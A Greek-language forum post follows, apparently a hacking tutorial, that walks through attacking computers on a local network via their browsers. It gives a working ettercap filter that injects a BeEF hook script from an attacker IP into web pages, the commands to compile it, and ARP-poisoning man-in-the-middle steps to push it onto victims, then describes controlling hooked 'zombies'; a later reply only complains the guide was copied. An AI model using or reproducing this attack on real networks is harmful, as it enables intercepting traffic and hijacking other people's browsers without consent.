Jump to content

Recommended Posts

Posted

Εισαγωγη

Γεια σας και παλι!Αποφασισα να κανω εναν οδηγο με το πως μπορειτε να εισβαλεται σε εναν υπολογιστη μεσω του browser του!Προσοχη:Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο

Tι θα χρειαστουμε?

Μα φυσικα Βacktrack 5 και το Cross-Site-Sctript (xss)

Ξεκινωντας

Παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα

#GreyHat
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Nothing!");
      }
}
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "</head>")) {
        replace("</head>", "</head><script src="http://192.168.1.66/beef/hook/beefmagic.js.php"></script> ");
        msg("EPIASES_LAYRAKIn");
    }
    if (search(DATA.data, "</HEAD>")) {
        replace("</HEAD>", "</HEAD><script src="http://192.168.1.66/beef/hook/beefmagic.js.php"></script> ");
        msg("epiases_layrakin");
    }
}

Eκει που γραφει http://192.168.1.66  θα πρεπει να βαλετε την δικη σας ip.

Ξεκινωντας Την Διαδικασια

Μετα αφου καναμε τα παραπανω ,παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef και παταμε να ανοιξει.

8333395.png

Μετα παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ και παταω open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ)

8333403.png

Αλλαξτε το http://127.0.0.1/beef με την δικια σας ip πχ http://192.168.1.66/beef ,πατα apply config και finished.

Τωρα για να δειτε τι κανει το beEF ακριβως μπορειτε να το δοκιμασετε σε εσας αν πατε στο view spawn zombie example

και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .Πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα

8333406.png

Και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss

8333412.png

Υπαρχουνε παρα πολλες επιλογες οπως: Nα εισβαλετε στον υπολογιστη του,Nα τον ανακατευθυνετε σε αλλη σελιδα κτλπ.

Τωρα πως κανουμε το θυμα να ενωθει μαζι μας;Ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο(terminal) και γραφουμε

 etterfilter /root/Desktop/xssbeef -ο xssbeef.ef

Μετα μας εμφανιζει αυτο

 

etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA

 

12 protocol tables loaded:

    DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

 

11 constants loaded:

    VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

 

Parsing source file '/root/Desktop/xssbeef'  done.

 

Unfolding the meta-tree  done.

 

Converting labels to real offsets  done.

 

Writing output to 'filter.ef'  done.

 

-> Script encoded into 20 instructions.

Μετα γραφουμε στο τερματικο,

ettercap -G

μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift u επιλεγουμε wlan0 μετα ctrl s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα

8333419.png

Τελος,παταμε ctrl  w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες)Αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας

 ettercap -T -M arp // // -F '/root/xssbeef.ef'  -i wlan0

8333425.png

 

Θελει αρκετη δουλεια μεχρι να μαθετε να χειριζεστε καλα ολο αυτο το συστημα..Συμβουλη -- Μην το βαζετε κατω και προσπαθηστε , θα δειτε οτι στο τελος ειναι απλο!

Ελπιζω να βοηθησα ευχαριστω

  • 7 months later...
Posted

an thes anefere kai tin pigi apo tous odigous pou bazis min tous pasaris gia dikous sou giati den einai...

 

trelenome otan kanete  copy-paste kai pasarete otidipote einai auto gia diko sas kai stin pragmatikotita den kserete pou pane ta 4. to palikari pou tous ebale exei afierosi xrono kai merika atoma to paizoun  << xaker >>

 

twra pou klidose tin selida katse grafta me to xeri

  • 3 weeks later...
  • 1 month later...
  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



  • Posts

    • L2 DEVS - HTML DESIGN (ALL NPC'S)    
    • I only share for free what they are reselling 🙂 You keep crying in all the publications, and if you are looking for h5 or gd wait for 5 or 6 years... cheers.... GENERAL Cached Extended to 8192kb IOBuffer Hair2SlotCache ItemBidAuctioner Clan Hall Current Olympiad Season Rank pages System (Shows Points/Games - Fully Configurable) Automatic Flag Around Raidboss System Offline Shop & Buffers Restore After Restart (Fixed location) Offline Buffer System PvP Auto Announce System Rebuilt with Extra Addons (Fully Configurable, Name, Zones, Rewards) Automatic Announce System Rebuilt with Extra Addons (Fully Configurable) ALT+B Augmentation House Shift+Click Droplist/Spoil List Epic Items Rank RB points Rank ChangeColorName ChangeColorTitle Change Skin (Race) Change Gender Custom Subclass (Acumulative) Achievements Item Delivery System  Augmentations/Enchants Automatic Announce System Auto Learn Skills PvP Reward Pk Reward War Reward Scheme buffer GlobalChatTrade Trade Augment Items Castle Announce Time Castle Standby Time Fix Spiritshots delay SpellbooksDrop Enable/Disable Drop custom Fully configurable, lvl min max allmobs, allrb, individual New cancel effect min,max BlessedarmorEnchantRate BlessedmagicWeaponEnchantRate BlessednormalWeaponEnchantRate MaxSlosChars MaxSlotsDwarfs Enable or disable all commands Fix fast loading npc OlympiadRestoreStatsOnFightStart OlympiadSystemSecondTimeEnabled OlympiadEnterLast10Minute OlympiadThirdClassSummons MinLevelTrade AnnounceSubClassMsg1 AnnounceSubClassMsg2 AnnounceSubClassMsg3 LimitedSubClassRace NoSellItems Change ID SealStones for AA NoPrivateBuyItems NoDropPlayerOnDie DisableSkillEnchantData Show Level Mobs Show npc clan flag DespawnSummonEnBattle SummonPetEnBattle RideSummonPetEnBattle DitanceToTargetMove EnterWorld_Undying EnterWorld_UnHide BlockWhispMessagePlayerToGM UseItemsWithHide CriticalSkillDamageBonusPer=4.0 Disable SSQSystem OnCastle Siege End Use any dyes Buy halls directly in auctioneer without waiting for the auction, configuration to change the item you consume MensajeEnterWorldServer Command .hero enable/disable hero aura Config vip global chat character, chat by systemsg Soulshots: NoSendSystemMessageUse Panel //admin Global vote reward Agathions system Anti Interface, control all patch files by md5 Command .menu configurable, last restart, name, maxusers, privatestores Spawn protection activate deactivate consume items to activate  Activate or deactivate autoloot for vip characters EVENTS Happy Hour Event reworked Configurable by announcements or systemsg Team VS Team Capture The Flag Death Match Last Man Standing Destroy The Base Korean Style Castle Siege Check if the player is inside the tvt event due to disconnection/critical error Top 1/5 killer reward/announce TimeAfk ResetReuseSkills ResetBuffsOnFinish Firework effect Reward win/lost Add Team Location Title custom Red/blue Open Door/Wall System BalanceBishops Show kills in title Invest positions Show Death To Top Delete Non-Subclass Skills     RELOADS Reload Enterworld Html Option Reload Faction System Reload Donate Shop Reload OfflineBuffer Reload Champion NPC Reload CliExt Reload AntiBot Reload Vip System Reload Auction Reload AutoLoot Reload CastleSiegeManager Reload CharacterLock Reload ClanPvPStatus Reload AutoLearn Reload ClanReputationRank Reload ClanSystem Reload CreatureAction Reload Customs.ini Reload L2server.ini Reload SkillData.txt Reload doordata.txt Reload decodata.txt Reload Multisell Reload DropList   Extender tested for more than 3 years. Assured stability. Possibility of adding MOD's upon request. (Not included, consult).
    • some peoples trash is another mans treasure, is that your treasure?   people might like the content but you are still the rat in the room     thats the community judging you.  
    • Keep reselling what I publish here for free!!! 🙂 GG  
  • Topics

×
×
  • Create New...